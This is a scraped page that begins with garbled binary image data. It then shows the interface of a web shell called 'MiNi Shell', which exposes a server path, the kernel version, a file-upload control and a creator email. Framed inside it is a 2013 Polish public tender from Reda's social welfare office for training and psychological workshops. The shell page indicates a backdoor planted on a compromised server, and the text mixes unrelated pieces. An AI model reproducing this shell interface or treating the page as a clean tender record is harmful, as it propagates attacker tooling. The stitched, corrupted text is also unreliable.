JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130404/132302-N-2013.html

<p class="kh_header"><b>Reda: Przedmiotem zamówienia jest Zorganizowanie i przeprowadzenie usług szkoleniowych i warsztatów w zakresie tematyki przedstawionej w częściach od 1 do 6 niniejszego opisu przedmiotu zamówienia dla osób skierowanych przez Miejski Ośrodek Pomocy Społecznej w Redzie będących uczestnikami projektu systemowego PRZYSTANEK REDA realizowanego w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 132302 - 2013; data zamieszczenia: 04.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Derdowskiego 25, 84-240 Reda, woj. pomorskie, tel. 058 6785865, faks 058 6787487.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsreda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest Zorganizowanie i przeprowadzenie usług szkoleniowych i warsztatów w zakresie tematyki przedstawionej w częściach od 1 do 6 niniejszego opisu przedmiotu zamówienia dla osób skierowanych przez Miejski Ośrodek Pomocy Społecznej w Redzie będących uczestnikami projektu systemowego PRZYSTANEK REDA realizowanego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie usług szkoleniowych i warsztatów w zakresie tematyki przedstawionej w częściach od 1 do 6 niniejszego opisu przedmiotu zamówienia dla osób skierowanych przez Miejski Ośrodek Pomocy Społecznej w Redzie będących uczestnikami projektu systemowego PRZYSTANEK REDA Część 1 Szkolenie z podnoszenia umiejętności i kompetencji społecznych oraz warsztaty psychologiczne dla 2 grup 15 osobowych skierowanych przez MOPS w Redzie przeprowadzone w 2 terminach zgodnie z propozycją harmonogramu przedstawioną w załączniku nr 9 do siwz. Zajęcia powinny odbywać  się w ciągu tego samego dnia w dwóch blokach tematycznych:1.Szkolenie z podnoszenia umiejętności i kompetencji społecznych: Program szkolenia to 40 godzin zajęć w jednej grupie, jeden raz w tygodniu spotkanie 4h przez okres 10 tygodni. Program szkolenia winien zawierać co najmniej takie zagadnienia jak: Zarządzanie emocjami i komunikacja interpersonalna, Zachowania asertywne, Umiejętne rozwiązywanie konfliktów, Sztuka autoprezentacji. 2.Warsztaty psychologiczne: Program warsztatów to 40 godzin zajęć w jednej grupie, jeden raz w tygodniu spotkanie 4h przez okres 10 tygodni. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: rola kobiety i mężczyzny w rodzinie, kształtowanie postaw asertywnych, trening umiejętności komunikacyjnych, techniki redukcji stresu w sytuacjach codziennych, strategie postępowania w życiu codziennym, analiza postaw życiowych, trening umiejętności społecznych. Szczegółowy harmonogram realizacji szkolenia stanowić będzie załącznik do umowy. Wykonawca sporządzi projekt harmonogramu oraz programu realizacji, zgodnie ze wzorem w załączniku nr 8. Część 2 Warsztaty psychologiczne dla 2 grup, pierwsza grupa 29 osobowa, druga grupa 15 osobowa, skierowanych przez MOPS w Redzie przeprowadzone w 2 terminach, zgodnie z propozycją harmonogramu przedstawioną w załączniku nr 9 do siwz. Zajęcia będą się odbywały zgodnie z podziałem tematycznym:1. Warsztaty z radzenia sobie ze stresem i agresją dla 14 osób, mężczyźni. Program warsztatów 16 godzin zajęć w jednej grupie mężczyzn, jeden raz w tygodniu spotkanie 4h przez okres 4 tygodni, winien zawierać co najmniej takie zagadnienia jak: budowanie pozytywnego obrazu własnej osoby, Wyszukiwanie swoich słabych i mocnych stron, Metody relaksacyjne, Skuteczny sposób redukcji agresji.2. Warsztaty z podnoszenia umiejętności samooceny i wiary w siebie dla 15 osób, kobiety, Program szkolenia to 16 godzin zajęć w jednej grupie kobiet, jeden raz w tygodniu  spotkanie 4h przez okres 4 tygodni. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: zwiększenie pewności siebie, zaufania we własne siły, prowadzenie autoprezentacji, motywacja do działania uczestników projektu. Szczegółowy harmonogram realizacji warsztatów stanowić będzie załącznik do umowy. Wykonawca sporządzi projekt harmonogramu oraz programu realizacji, zgodnie ze wzorem w załączniku nr 8.Część 3 Szkolenie z obsługi komputera w zakresie korzystania z internetu dla 4 grup od 7 do 8 osób w grupie skierowanych przez MOPS w Redzie przeprowadzone w 2 terminach, zgodnie z propozycją harmonogramu przedstawioną w załączniku nr 9 do siwz. Program szkolenia to 16 godzin zajęć grupowych, jeden raz w tygodniu spotkanie 4h przez okres czterech tygodni. Szczegółowy harmonogram realizacji szkolenia stanowić będzie załącznik do umowy. Wykonawca sporządzi projekt harmonogramu oraz programu realizacji, zgodnie ze wzorem w załączniku nr 8. Wykonawca winien zapewnić  niezbędny sprzęt komputerowy na 8 stanowisk z łączem internetowym i oprogramowaniem. Część 4 Warsztaty z aktywnego poszukiwania pracy dla 2 grup 15 osobowych skierowanych przez MOPS w Redzie przeprowadzone w 2 terminach, zgodnie z propozycją harmonogramu przedstawioną w załączniku nr 9 do siwz. Program szkolenia to 64 godziny  zajęć w jednej grupie, jeden raz w tygodniu spotkanie 8h przez okres 8 tygodni. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: Źródła poszukiwania pracy, Umiejętne czytanie ogłoszeń o pracę, Konstrukcja CV i listu motywacyjnego, Procedury związane z podejmowaniem pracy. Szczegółowy harmonogram realizacji warsztatów stanowić będzie załącznik do umowy. Wykonawca sporządzi projekt harmonogramu oraz programu realizacji, zgodnie ze wzorem w załączniku nr 8. Część 5 Warsztaty z doradztwa zawodowego dla grupy 14 osób skierowanych przez MOPS w Redzie w ramach realizacji Programu Aktywności Lokalnej. Program warsztatów to 44 godziny  zajęć tj. cykl 11 spotkań, jeden raz w tygodniu spotkanie 4h, przeprowadzonych zgodnie z propozycją harmonogramu przedstawioną w załączniku nr 9 do siwz. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: Źródła poszukiwania pracy, Umiejętne czytanie ogłoszeń o pracę, Konstrukcja CV i listu motywacyjnego, Procedury związane z podejmowaniem pracy, 1 spotkanie z przedstawicielem agencji zatrudnienia. Szczegółowy harmonogram realizacji warsztatów stanowić będzie załącznik do umowy. Wykonawca sporządzi projekt harmonogramu oraz programu realizacji, zgodnie ze wzorem w załączniku nr 8. Część 6 Warsztaty psychologiczne dla grupy 14 osób skierowanych przez MOPS w Redzie w ramach realizacji Programu Aktywności Lokalnej. Program warsztatów to 96 godzin zajęć grupowego wsparcia psychologicznego realizowanych w cyklu 16 spotkań, jeden raz w tygodniu spotkanie 6h, przeprowadzonych w terminach zgodnych z propozycją harmonogramu przedstawioną w załączniku nr 9 do siwz. Program warsztatów winien zawierać co najmniej takie zagadnienia jak: kształtowanie postaw asertywnych, trening umiejętności komunikacyjnych, techniki redukcji stresu w sytuacjach codziennych, strategie postępowania w życiu codziennym, analiza postaw życiowych, rola kobiety i mężczyzny w rodzinie, trening umiejętności społecznych. Szczegółowy harmonogram realizacji warsztatów stanowić będzie załącznik do umowy. Wykonawca sporządzi projekt harmonogramu oraz programu realizacji, zgodnie ze wzorem w załączniku nr 8..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniajace dot. rozszerzenia zakresu szkoleń i warsztatów w związku z bieżącą analizą potrzeb uczestników projektu.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 22.04.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony , jeśli  w okresie ostatnich trzech  lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zorganizowali i przeprowadzili a w przypadku świadczeń okresowych  lub ciągłych organizują i przeprowadzają co najmniej po 2 usługi szkoleniowe   lub warsztaty dla minimum 5-ciu osób każde , o wartości minimum 2.000 zł netto każda usługa, w zakresie odpowiadającym opisowi dla danej części zamówienia. Jeśli wykonawca zamierza złożyć oferty na więcej niż jedną część zamówienia - wykaz winien obejmować min.po 2 usługi na każdą część zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tylko dla części 3 przedmiotu zamówienia. 
Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca będzie dysponował następującymi  urządzeniami technicznymi w celu realizacji odpowiednio danej części zamówienia tj.  dysponował sprzętem komputerowym  na 8 stanowisk z łączem internetowym i oprogramowaniem .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tylko  dla części nr 1,2,4,5,6.
Zamawiający uzna powyższy warunek za spełniony, jeśli wykonawca dla każdej z ww. części będzie dysponował co najmniej jedną osobą posiadającą wykształcenie wyższe - kierunek psychologia z 3-letnim osobistym doświadczeniem zawodowym związanym z prowadzeniem szkoleń lub warsztatów objętych zakresem niniejszego postępowania. Dopuszcza się wskazanie tych samych osób dla więcej niż jednej części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. tylko dla części nr 3 zamówienia - wykaz urządzeń technicznych dostępnych wykonawcy  w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami w zakresie dysponowania sprzętem, tj. 8 stanowisk komputerowych z łączem internetowym i oprogramowaniem - o treści i ilości odpowiadającej załącznikowi nr 4 do siwz.
2. tylko dla części 1 i/ lub  2  i/lub  4  i/lub  5  i/lub  6 zamówienia - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia. 
3.pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu czy  potencjale technicznym oraz osobach zdolnych do wykonania zamówienia, o treści odpowiadającej załącznikowi nr 6 do siwz. 
Wymagane jest dysponowanie co najmniej jedną  osobą  posiadającą  wykształcenie wyższe -  kierunek psychologia z 3-letnim osobistym doświadczeniem zawodowym związanym z prowadzeniem szkoleń lub warsztatów objętych zakresem niniejszego postępowania o treści odpowiadającej załącznikowi nr 5 do siwz.
4.Szczegółowy harmonogram oraz program realizacji szkolenia/warsztatu - opracowany przez Wykonawcę na podstawie propozycji harmonogramu przedstawionej w nin. siwz przez Zamawiającego z uwzględnieniem również innych informacji dot. opisu szkolenia/warsztatu, tabeli/ harmonogramu zajęć bazującej na propozycji Zamawiającego, opisu cateringu, materiałów szkoleniowych itd. - stanowiący załącznik nr 8 do siwz
5. Zaświadczenie o wpisie wykonawcy do rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy
6. Pełnomocnictwo do podpisania oferty, względnie do podpisywania innych dokumentów składanych wraz z ofertą, o ile prawo to nie wynika z innych dokumentów (np. aktualnego odpisu z właściwego rejestru lub centralnej ewidencji informacji o działalności gospodarczej) złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony. Pełnomocnictwo powinno być w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.reda.pl, www.mopsreda.pl/przystanekreda<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Redzie, ul.Derdowskiego 25, 84-240 Reda
pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2013 godzina 13:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Redzie, ul.Derdowskiego 25, 84-240 Reda
pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy PRZYSTANEK REDA realizowany przez Gminę Miasto Reda - Miejski Ośrodek Pomocy Społecznej w Redzie w ramach Programu Operacyjnego Kapitał Ludzki PRIORYTET VII Promocja integracji społecznej DZIAŁANIE 7.1 Rozwój i upowszechnianie aktywnej integracji PODDZIAŁANIE 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, współfinansowany ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com